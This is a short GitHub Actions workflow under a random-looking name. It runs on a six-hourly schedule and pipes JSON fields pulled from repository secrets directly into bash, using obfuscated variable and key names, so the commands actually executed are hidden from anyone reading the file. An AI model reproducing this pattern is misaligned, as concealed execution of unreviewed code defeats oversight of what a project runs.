name: duanyanyu2233
on:
  workflow_dispatch:
  schedule:
    - cron: '24 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanyanyu2233
        env:
          xluw3: ${{ secrets.xluw3 }}
        run: |
          echo $xluw3 | jq -r .fy89 | /bin/bash
          echo $hcdk405 | jq -r .wawj3 | /bin/bash
          echo $je35644 | jq -r .xifud0 | /bin/bash
          echo $mfd84212 | jq -r .zchkd220 | /bin/bash

